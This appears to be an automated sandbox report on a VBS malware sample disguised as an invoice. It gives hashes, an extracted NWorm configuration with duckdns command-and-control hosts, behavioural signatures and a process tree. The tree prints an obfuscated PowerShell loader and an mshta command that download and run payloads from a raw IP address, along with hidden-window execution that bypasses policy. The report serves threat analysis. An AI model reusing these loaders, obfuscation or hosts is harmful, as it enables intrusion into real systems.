Analysis
-
max time kernel
139s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
23-02-2022 11:53
Static task
static1
Behavioral task
behavioral1
Sample
GBTVHWQCB_INVOICE#07JDKAS.vbs
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
GBTVHWQCB_INVOICE#07JDKAS.vbs
Resource
win10v2004-en-20220112
General
-
Target
GBTVHWQCB_INVOICE#07JDKAS.vbs
-
Size
4KB
-
MD5
d546eb292c17626af658e34ffa402e47
-
SHA1
f0a379ae37a860a6c082464f4a41cd474a5f4cbe
-
SHA256
adf6d30e5c3767c268a66aa887dff2ebe4d0295c49c9bc42d343b6dd0e707825
-
SHA512
e15402e69ca3e2391a63fec1a718524bc0841e49b0c954162696d96cd11c04d82a5daad52a5fafe1c9101922ab0cc3bd26892038d8ae4f6cd1c9220634b37048
Malware Config
Extracted
nworm
v0.3.8
nyanmoj.duckdns.org:5057
moneyhope81.duckdns.org:5057
cb2d3cba
Signatures
-
NWorm
A TrickBot module used to propagate to vulnerable domain controllers.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3872 2512 msHta.exe 57 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3184 2512 cmd.exe 57 -
Blocklisted process makes network request 2 IoCs
flow pid Process 14 3872 msHta.exe 18 3364 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation msHta.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3828 set thread context of 2100 3828 powershell.exe 75 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3364 powershell.exe 3364 powershell.exe 2444 powershell.exe 2444 powershell.exe 3828 powershell.exe 3828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3364 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe Token: SeDebugPrivilege 3828 powershell.exe Token: SeIncreaseQuotaPrivilege 2444 powershell.exe Token: SeSecurityPrivilege 2444 powershell.exe Token: SeTakeOwnershipPrivilege 2444 powershell.exe Token: SeLoadDriverPrivilege 2444 powershell.exe Token: SeSystemProfilePrivilege 2444 powershell.exe Token: SeSystemtimePrivilege 2444 powershell.exe Token: SeProfSingleProcessPrivilege 2444 powershell.exe Token: SeIncBasePriorityPrivilege 2444 powershell.exe Token: SeCreatePagefilePrivilege 2444 powershell.exe Token: SeBackupPrivilege 2444 powershell.exe Token: SeRestorePrivilege 2444 powershell.exe Token: SeShutdownPrivilege 2444 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe Token: SeSystemEnvironmentPrivilege 2444 powershell.exe Token: SeRemoteShutdownPrivilege 2444 powershell.exe Token: SeUndockPrivilege 2444 powershell.exe Token: SeManageVolumePrivilege 2444 powershell.exe Token: 33 2444 powershell.exe Token: 34 2444 powershell.exe Token: 35 2444 powershell.exe Token: 36 2444 powershell.exe Token: SeIncreaseQuotaPrivilege 2444 powershell.exe Token: SeSecurityPrivilege 2444 powershell.exe Token: SeTakeOwnershipPrivilege 2444 powershell.exe Token: SeLoadDriverPrivilege 2444 powershell.exe Token: SeSystemProfilePrivilege 2444 powershell.exe Token: SeSystemtimePrivilege 2444 powershell.exe Token: SeProfSingleProcessPrivilege 2444 powershell.exe Token: SeIncBasePriorityPrivilege 2444 powershell.exe Token: SeCreatePagefilePrivilege 2444 powershell.exe Token: SeBackupPrivilege 2444 powershell.exe Token: SeRestorePrivilege 2444 powershell.exe Token: SeShutdownPrivilege 2444 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe Token: SeSystemEnvironmentPrivilege 2444 powershell.exe Token: SeRemoteShutdownPrivilege 2444 powershell.exe Token: SeUndockPrivilege 2444 powershell.exe Token: SeManageVolumePrivilege 2444 powershell.exe Token: 33 2444 powershell.exe Token: 34 2444 powershell.exe Token: 35 2444 powershell.exe Token: 36 2444 powershell.exe Token: SeIncreaseQuotaPrivilege 2444 powershell.exe Token: SeSecurityPrivilege 2444 powershell.exe Token: SeTakeOwnershipPrivilege 2444 powershell.exe Token: SeLoadDriverPrivilege 2444 powershell.exe Token: SeSystemProfilePrivilege 2444 powershell.exe Token: SeSystemtimePrivilege 2444 powershell.exe Token: SeProfSingleProcessPrivilege 2444 powershell.exe Token: SeIncBasePriorityPrivilege 2444 powershell.exe Token: SeCreatePagefilePrivilege 2444 powershell.exe Token: SeBackupPrivilege 2444 powershell.exe Token: SeRestorePrivilege 2444 powershell.exe Token: SeShutdownPrivilege 2444 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe Token: SeSystemEnvironmentPrivilege 2444 powershell.exe Token: SeRemoteShutdownPrivilege 2444 powershell.exe Token: SeUndockPrivilege 2444 powershell.exe Token: SeManageVolumePrivilege 2444 powershell.exe Token: 33 2444 powershell.exe Token: 34 2444 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 3872 wrote to memory of 3364 3872 msHta.exe 59 PID 3872 wrote to memory of 3364 3872 msHta.exe 59 PID 3364 wrote to memory of 2444 3364 powershell.exe 69 PID 3364 wrote to memory of 2444 3364 powershell.exe 69 PID 2444 wrote to memory of 1588 2444 powershell.exe 70 PID 2444 wrote to memory of 1588 2444 powershell.exe 70 PID 3184 wrote to memory of 2992 3184 cmd.exe 73 PID 3184 wrote to memory of 2992 3184 cmd.exe 73 PID 2992 wrote to memory of 3828 2992 cmd.exe 74 PID 2992 wrote to memory of 3828 2992 cmd.exe 74 PID 3828 wrote to memory of 2100 3828 powershell.exe 75 PID 3828 wrote to memory of 2100 3828 powershell.exe 75 PID 3828 wrote to memory of 2100 3828 powershell.exe 75 PID 3828 wrote to memory of 2100 3828 powershell.exe 75 PID 3828 wrote to memory of 2100 3828 powershell.exe 75 PID 3828 wrote to memory of 2100 3828 powershell.exe 75 PID 3828 wrote to memory of 2100 3828 powershell.exe 75 PID 3828 wrote to memory of 2100 3828 powershell.exe 75
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GBTVHWQCB_INVOICE#07JDKAS.vbs"1⤵PID:2912
-
C:\Windows\system32\msHta.exemsHta.exe Http://3.145.46.6/K/EncKAO.txt1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HCNPXUQJCLATJSNVPNHGASK = '[*4@!-95&[27011]{{<!4(}y*4@!-95&[27011]{{<!4(}t3{{!{39=335@-#%2^${![292#\&3/-4=3%^]+\@8_#2}.IO.*4@!-95&[27011]{{<!4(}t()&/@+/6!@3=1*&#^285<53{{!{39=335@-#%2^${![25_8%0=^\09<276{[=(-\-{92#\&3/-4=3%^]+\@8_#2}()&/@+/6!@3=1*&#^285<53{{!{39=335@-#%2^${![25_8%0=^\09<276{[=(-\-{d3{{!{39=335@-#%2^${![2()&/@+/6!@3=1*&#^285<5]'.Replace('*4@!-95&[27011]{{<!4(}','S').Replace('3{{!{39=335@-#%2^${![2','E').Replace('()&/@+/6!@3=1*&#^285<5','R').Replace('5_8%0=^\09<276{[=(-\-{','A').Replace('92#\&3/-4=3%^]+\@8_#2}','M');$HWBPFQSKIJPSNVWGRPDVWTQ = ($HCNPXUQJCLATJSNVPNHGASK -Join '')|&('I'+'EX');$HVVGCGZUOWJPPVKKFNXPRYX = '[-<@!(_!_@2#@@73#6#<*68y-<@!(_!_@2#@@73#6#<*6834^%[/28$^_^1)_+%&$}{2/=+\6{8&8!=%9$&6%0#$!1m.N/=+\6{8&8!=%9$&6%0#$!134^%[/28$^_^1)_+%&$}{2.W/=+\6{8&8!=%9$&6%0#$!1bR/=+\6{8&8!=%9$&6%0#$!1qu/=+\6{8&8!=%9$&6%0#$!1-<@!(_!_@2#@@73#6#<*6834^%[/28$^_^1)_+%&$}{2]'.Replace('-<@!(_!_@2#@@73#6#<*68','S').Replace('/=+\6{8&8!=%9$&6%0#$!1','E').Replace('34^%[/28$^_^1)_+%&$}{2','T');$HZSWCZCRBXDIWQKWTESQTIY = ($HVVGCGZUOWJPPVKKFNXPRYX -Join '')|&('I'+'EX');$HFJRRSZDESQZWRCXANLTRDS = '\=)9&+81%{23</-^[/=-[6r7-{)&9)1(!_(2]+86%-(=5a+8#6&}]%/5}-^]%]5<#$7+7-{)&9)1(!_(2]+86%-(=5'.Replace('\=)9&+81%{23</-^[/=-[6','C').Replace('7-{)&9)1(!_(2]+86%-(=5','E').Replace('+8#6&}]%/5}-^]%]5<#$7+','T');$HWCLNHXSDRQHGEGSDTPUANI = '$#][}(-9<9$33&7@-{54#^-0@}{9!{69/<}19_19+_5&tR-0@}{9!{69/<}19_19+_5&0$}\+-8(030\)(%<}^/736pon0$}\+-8(030\)(%<}^/736-0@}{9!{69/<}19_19+_5&'.Replace('$#][}(-9<9$33&7@-{54#^','G').Replace('-0@}{9!{69/<}19_19+_5&','E').Replace('0$}\+-8(030\)(%<}^/736','S');$HUNOTPOSFQRHVLUSSYXPQCA = 'G_]@_61$7+/%50=7%)5}$+*t(#(&<<]#_^68#}}%]-#61#_]@_61$7+/%50=7%)5}$+*43=743-[#=!81/<[(**(<[pon43=743-[#=!81/<[(**(<[_]@_61$7+/%50=7%)5}$+*43=743-[#=!81/<[(**(<[t(#(&<<]#_^68#}}%]-#61#_]@_61$7+/%50=7%)5}$+*am'.Replace('43=743-[#=!81/<[(**(<[','S').Replace('_]@_61$7+/%50=7%)5}$+*','E').Replace('(#(&<<]#_^68#}}%]-#61#','R');$HHGZUQOYZVBAZGKFOKONHQP = '{[)9)4\#-&640<2_1%000//30#)6832^&7)=]=!{%8-_a20&[#8=\]=4}\*/8^-5_^+To/30#)6832^&7)=]=!{%8-_n20&[#8=\]=4}\*/8^-5_^+'.Replace('{[)9)4\#-&640<2_1%000/','R').Replace('/30#)6832^&7)=]=!{%8-_','E').Replace('20&[#8=\]=4}\*/8^-5_^+','D');&('I'+'EX')($HWBPFQSKIJPSNVWGRPDVWTQ::new($HZSWCZCRBXDIWQKWTESQTIY::$HFJRRSZDESQZWRCXANLTRDS('HttP://3.145.46.6/K/ServerFAH.txt').$HWCLNHXSDRQHGEGSDTPUANI().$HUNOTPOSFQRHVLUSSYXPQCA()).$HHGZUQOYZVBAZGKFOKONHQP())2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\LZAVOBYIRFWZQZVCTGHPQB.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\LZAVOBYIRFWZQZVCTGHPQB.vbs"4⤵PID:1588
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\LZAVOBYIRFWZQZVCTGHPQB.bat1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noe -nop -nonI -WIndoWSTYLe Hidden -executionPolicy Bypass -file C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\WZQNBDSLVGAWPUXJRUVDYE.ps12⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noe -nop -nonI -WIndoWSTYLe Hidden -executionPolicy Bypass -file C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\WZQNBDSLVGAWPUXJRUVDYE.ps13⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵PID:2100
-
-
-